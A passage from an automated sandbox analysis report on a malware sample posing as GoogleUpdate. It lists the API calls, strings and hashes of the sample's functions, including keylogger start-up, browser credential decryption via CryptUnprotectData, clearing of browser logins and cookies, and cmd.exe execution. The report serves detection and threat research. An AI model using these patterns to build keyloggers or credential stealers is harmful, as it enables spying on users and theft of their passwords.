                                  • Part of subcall function 00419F23: GetCurrentProcess.KERNEL32(?,?,?,00410C6A), ref: 00419F34
                                  • Part of subcall function 00419F23: IsWow64Process.KERNEL32(00000000,?,?,00410C6A), ref: 00419F3B
                                • _wcslen.LIBCMT ref: 00419744
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                • String ID: .exe$program files (x86)\$program files\
                                • API String ID: 3286818993-1203593143
                                • Opcode ID: 86729fe019a23bc556b69f726f0ebb4809113869e7e910a47738a92f1b0ca9da
                                • Instruction ID: a7f24a5d9d5c0dc772ada330bc3383911e5a1e9af4e42701afe0c0cb79e45fb3
                                • Opcode Fuzzy Hash: 86729fe019a23bc556b69f726f0ebb4809113869e7e910a47738a92f1b0ca9da
                                • Instruction Fuzzy Hash: CB21B872A001046BDF14BAB6DD968FE37AD9E4831CB04057FF405B32D2ED7D8D5942A9
                                APIs
                                • GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                • wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 0040962E: SetEvent.KERNEL32(?,?,?,0040A77B,?,?,?,?,?,00000000), ref: 0040965A
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: EventLocalTimewsprintf
                                • String ID: [%04i/%02i/%02i %02i:%02i:%02i $]
                                • API String ID: 1497725170-1359877963
                                • Opcode ID: 41a020b40271810fca9afcffff3f4e02382fdafe0505e2b5479bf2d94888a367
                                • Instruction ID: 6803640c9eec9339f7c785541c6425a10534024a2ea1efda602809c990ee83c1
                                • Opcode Fuzzy Hash: 41a020b40271810fca9afcffff3f4e02382fdafe0505e2b5479bf2d94888a367
                                • Instruction Fuzzy Hash: 5E114272504118AAC708FB96EC558FE77BCEE48315B00412FF806661D2EF7C5A46D6A9
                                APIs
                                  • Part of subcall function 0040A0B0: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A0BE
                                  • Part of subcall function 0040A0B0: wsprintfW.USER32 ref: 0040A13F
                                  • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                • CreateThread.KERNEL32(00000000,00000000,Function_000092EF,?,00000000,00000000), ref: 00409EB7
                                • CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 00409EC3
                                • CreateThread.KERNEL32(00000000,00000000,0040931D,?,00000000,00000000), ref: 00409ECF
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread$LocalTime$wsprintf
                                • String ID: Online Keylogger Started
                                • API String ID: 112202259-1258561607
                                • Opcode ID: 86dbd2ede10dcdaea0f387c1138916226ec1cb0004849d923c05056a418c9c0b
                                • Instruction ID: 28bbfba120e67fe9302c314101e9d6be38f8a9d2e5fa49f3fb55d6307d966583
                                • Opcode Fuzzy Hash: 86dbd2ede10dcdaea0f387c1138916226ec1cb0004849d923c05056a418c9c0b
                                • Instruction Fuzzy Hash: 7F01C4A0A042083AE62076768CD6DBF7A6CCA92398B40047FFA45221C3D9B85C5586FE
                                APIs
                                • CloseHandle.KERNEL32(00000000,?,00000000,?,00452FD6,00000000), ref: 0044815D
                                • GetLastError.KERNEL32(?,00000000,?,00452FD6,00000000), ref: 00448167
                                • __dosmaperr.LIBCMT ref: 00448192
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseErrorHandleLast__dosmaperr
                                • String ID: /j
                                • API String ID: 2583163307-1531585719
                                • Opcode ID: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
                                • Instruction ID: bc407199021615a177a746a92b253f91ed1213c20eb266450d42f323bf4fb8fa
                                • Opcode Fuzzy Hash: 6b46bd80387a4c42d1e368ef137c45b3139bac899a2854b8375f5110eabc8c11
                                • Instruction Fuzzy Hash: 05014932A011641AF7247375A845B7F67494B81778F26026FFD0D8B2E2DF6C8C83815D
                                APIs
                                • LoadLibraryA.KERNEL32(crypt32,CryptUnprotectData,?,00000000,00406039,?), ref: 00406090
                                • GetProcAddress.KERNEL32(00000000), ref: 00406097
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressLibraryLoadProc
                                • String ID: CryptUnprotectData$crypt32
                                • API String ID: 2574300362-2380590389
                                • Opcode ID: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction ID: 6e7317174224a8efb10ab03f2076fe60a9434866ae70ffeafd7cb5b8c28562e1
                                • Opcode Fuzzy Hash: f0fa7d81e448b8e45dda707d186e5b4dbadcbde3f04206e46648964c8c5bf07c
                                • Instruction Fuzzy Hash: C801F535A04205ABCF18CFA9D8049ABBBB8AB54300F00427FE956E3380D635D904C794
                                APIs
                                • PathFileExistsW.SHLWAPI(00000000,00000000,?,?,?,?,?,00415594,00000000), ref: 00418CF2
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExistsFilePath
                                • String ID: P0F$alarm.wav$x(G
                                • API String ID: 1174141254-3464520750
                                • Opcode ID: f11ea016c6a2c2bc35a45c8576492c2ff566f7a4dbbfb1194511a6f4b61926ae
                                • Instruction ID: fe962266bcbe9b481af3baecc2186877703bd5259ecc619923a55b1e0e4c82aa
                                • Opcode Fuzzy Hash: f11ea016c6a2c2bc35a45c8576492c2ff566f7a4dbbfb1194511a6f4b61926ae
                                • Instruction Fuzzy Hash: 40019270B0430056C604F7A6E9566EE37958BA1358F00857FA849672E2EEBD4D45C6CF
                                APIs
                                • WaitForSingleObject.KERNEL32(?,000003E8,?,?,?,00405139), ref: 00405153
                                • CloseHandle.KERNEL32(?), ref: 004051AA
                                • SetEvent.KERNEL32(?), ref: 004051B9
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEventHandleObjectSingleWait
                                • String ID: Connection Timeout
                                • API String ID: 2055531096-499159329
                                • Opcode ID: 0fe5635f683795d8cfe0579df31b5987a28acbd550c3129ce8b44c2f0693b938
                                • Instruction ID: 59ae86e236e2a5bc5991cc3fd82f69d26eb1b9a4ba12329ef82c58e56ff8d0a2
                                • Opcode Fuzzy Hash: 0fe5635f683795d8cfe0579df31b5987a28acbd550c3129ce8b44c2f0693b938
                                • Instruction Fuzzy Hash: F901F531A40F40AFE711BB368C4551B7BD4FF01302704097FE19356AA1D6B89800CF49
                                APIs
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040D25E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Exception@8Throw
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 2005118841-1866435925
                                • Opcode ID: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                • Instruction ID: 5123bbd1fc4d669f1c4d6c1cc045f4f856aea5ad0ec182f95f4946492138bf11
                                • Opcode Fuzzy Hash: c2bed29ba638d9f2391385ea3c87f8400cac86e7986091462376dda2deee5712
                                • Instruction Fuzzy Hash: 0401A261E44208BAD714EAD1C853FBA73689B64705F10806FB911751C2EA7DAA4E862F
                                APIs
                                • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0041487B
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExecuteShell
                                • String ID: /C $cmd.exe$open
                                • API String ID: 587946157-3896048727
                                • Opcode ID: 200560daae6b7c2951921310a9a850d73dd86d63f9695ecaabf21497659b4c2f
                                • Instruction ID: 0094db9d050c86e8b7efcb7c1e993d1de0046a6f7675c6b5aa1ef49a358ded74
                                • Opcode Fuzzy Hash: 200560daae6b7c2951921310a9a850d73dd86d63f9695ecaabf21497659b4c2f
                                • Instruction Fuzzy Hash: 8FF017712083049BC304FBB5DC91DEFB39CAB90348F50493FB556921E2EE789949C65A
                                APIs
                                • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,00472248,00471FFC), ref: 00412030
                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 0041204B
                                • RegCloseKey.ADVAPI32(00000000), ref: 00412054
                                Strings
                                • http\shell\open\command, xrefs: 00412026
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: http\shell\open\command
                                • API String ID: 3677997916-1487954565
                                • Opcode ID: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
                                • Instruction ID: 0e37d8025f140bc42ec1a8b72352379eb981339daaa9ecb07b48012be1c394e8
                                • Opcode Fuzzy Hash: 02d9583b321f90b8fde47cd3c5079fbeabf7c3eeeb86fcf6652fd9b53942e913
                                • Instruction Fuzzy Hash: C5F0C271500218FBDB609B95DC49EDFBBBCEB84B12F1040A6BA04E2150DAB55F98C7A5
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040C9D9
                                • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 0040CA18
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 0043340C
                                  • Part of subcall function 004333ED: _Yarn.LIBCPMT ref: 00433430
                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040CA3E
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Yarnstd::_$Exception@8Locinfo::_Locinfo_ctorLockitLockit::_Throw
                                • String ID: bad locale name
                                • API String ID: 3628047217-1405518554
                                • Opcode ID: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                • Instruction ID: 2c4ad0125759e8972babdbfe9bad97e9a7b68ba46d49635da0f31685b809246c
                                • Opcode Fuzzy Hash: b8ecc850591a1ec77cb11eee1f92953351954c39fd186dfa0a3b440cd31c26bd
                                • Instruction Fuzzy Hash: 6EF01232500604FAC328FBA6DC5299A77A49F14719F508D3FF545214D1FF396A18C699
                                APIs
                                • TerminateThread.KERNEL32(Function_00009305,00000000,0gj,0040BC76,?,00472200,pth_unenc,0gj), ref: 0040A801
                                • UnhookWindowsHookEx.USER32(000404CB), ref: 0040A811
                                • TerminateThread.KERNEL32(004092EF,00000000,?,00472200,pth_unenc,0gj), ref: 0040A823
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: TerminateThread$HookUnhookWindows
                                • String ID: 0gj
                                • API String ID: 3123878439-1559316900
                                • Opcode ID: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
                                • Instruction ID: 1ea45cce1470398c8d9247cd1949440ee3d7e4d102938376389503cdeb19b454
                                • Opcode Fuzzy Hash: 8267290ba39d94e96aad68657565d8cdeaa2cc55df27e2dd61bae36986e01b15
                                • Instruction Fuzzy Hash: A4E01D711443456FE3105F606DD49157B5CE6083597514875B606531B1C67CCC88CB3D
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: __alldvrm$_strrchr
                                • String ID:
                                • API String ID: 1036877536-0
                                • Opcode ID: 37a389c91fd0305d0bc5a94ad43230e35c365edb8f3973a3c9d9ada82f0d9176
                                • Instruction ID: 8a3f88530d83194aa24a517e4ef6e15a272d99a70002873db7a8ab856bdac54d
                                • Opcode Fuzzy Hash: 37a389c91fd0305d0bc5a94ad43230e35c365edb8f3973a3c9d9ada82f0d9176
                                • Instruction Fuzzy Hash: 18A12572A012869FFB21CE18C8817AEBBA1EF65314F24416FE5859B382CA3C8941C759
                                APIs
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                • Instruction ID: 9707d98a659f88f98630b1874925085f47dfd26ea07d7c57405a666b90b138a8
                                • Opcode Fuzzy Hash: ee8e1cba0696e1ef76f6de9b16e819625eafbf0b8f389bd133dd680e215230cb
                                • Instruction Fuzzy Hash: 69412C32A041006BDB21AFBA8C4666F3BA5DF453B7F10461FFC18D6293DB3C8E15466A
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction ID: c1abd53b49e6a7723cad7358b49d7c046164203d86e3a19123cc85c40c5f12b7
                                • Opcode Fuzzy Hash: 708417122de2711bb2eb7b93dd9c5bc77eababb27f74811c5393ad6cf28abd82
                                • Instruction Fuzzy Hash: 93412871E00704AFD7249F79CC46B5A7BA9EB8C714F10523FF142DB681D37999498788
                                APIs
                                Strings
                                • Cleared browsers logins and cookies., xrefs: 0040B036
                                • [Cleared browsers logins and cookies.], xrefs: 0040B025
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Sleep
                                • String ID: [Cleared browsers logins and cookies.]$Cleared browsers logins and cookies.
                                • API String ID: 3472027048-1236744412
                                • Opcode ID: 22af38848156231607467cecf4957511bc3d3078600c1b41cc0bd9b9b2c616f1
                                • Instruction ID: 9e673e540e653d5dfc9c41bfd33b173fe745421aa21f598ea7623546fa890e2b
                                • Opcode Fuzzy Hash: 22af38848156231607467cecf4957511bc3d3078600c1b41cc0bd9b9b2c616f1
                                • Instruction Fuzzy Hash: EE31A24074C3826EDA11BBB555267EF6B924A53758F0844BFF8C42B3C3D9BA4818936F
                                APIs
                                • _free.LIBCMT ref: 004468EC
                                  • Part of subcall function 00443C92: HeapFree.KERNEL32(00000000,00000000,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?), ref: 00443CA8
                                  • Part of subcall function 00443C92: GetLastError.KERNEL32(?,?,0044DE4F,?,00000000,?,00000000,?,0044E0F3,?,00000007,?,?,0044E63E,?,?), ref: 00443CBA
                                • GetTimeZoneInformation.KERNEL32 ref: 004468FE
                                • WideCharToMultiByte.KERNEL32(00000000,?,0046F754,000000FF,?,0000003F,?,?), ref: 00446976
                                • WideCharToMultiByte.KERNEL32(00000000,?,0046F7A8,000000FF,?,0000003F,?,?,?,0046F754,000000FF,?,0000003F,?,?), ref: 004469A3
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone_free
                                • String ID:
                                • API String ID: 806657224-0
                                • Opcode ID: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                • Instruction ID: 2b7d8a9ac893eb444b3138181a21c3719d458e34cf104297cae44ef8c21a1482
                                • Opcode Fuzzy Hash: c4754ecadf84a16d93ca9149c5e3776e61e7a877748ed8df02352f8ef7aba337
                                • Instruction Fuzzy Hash: 4F31A5B1904245EFDB11DF69DC80469BBB8FF0671171602BFE090972A1D7B49D04DB5A
                                APIs
                                  • Part of subcall function 0041A2DB: GetForegroundWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041A2EB
                                  • Part of subcall function 0041A2DB: GetWindowTextLengthW.USER32(00000000), ref: 0041A2F4
                                  • Part of subcall function 0041A2DB: GetWindowTextW.USER32(00000000,00000000,00000001), ref: 0041A31E
                                • Sleep.KERNEL32(000001F4), ref: 0040955A
                                • Sleep.KERNEL32(00000064), ref: 004095F5
                                Strings
                                Memory Dump Source
                                • Source File: 0000000A.00000002.4123563819.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 0000000A.00000002.4123529006.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123619747.0000000000456000.00000002.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.000000000046E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123657048.0000000000471000.00000004.00000001.01000000.00000008.sdmpDownload File
                                • Associated: 0000000A.00000002.4123700556.0000000000475000.00000002.00000001.01000000.00000008.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_10_2_400000_GoogleUpdate.jbxd
                                Yara matches
                                Similarity
                                • API ID: Window$SleepText$ForegroundLength
                                • String ID: [ $ ]
                                • API String ID: 3309952895-93608704
                                • Opcode ID: f35117b26c77fa319d9cb66e8045cf75f7298dad09c70da495946e86f577ec05
                                • Instruction ID: f130b1bb1348f748448b569433b56ba5176942d51498ef551544d7c0cb15bd34
                                • Opcode Fuzzy Hash: f35117b26c77fa319d9cb66e8045cf75f7298dad09c70da495946e86f577ec05
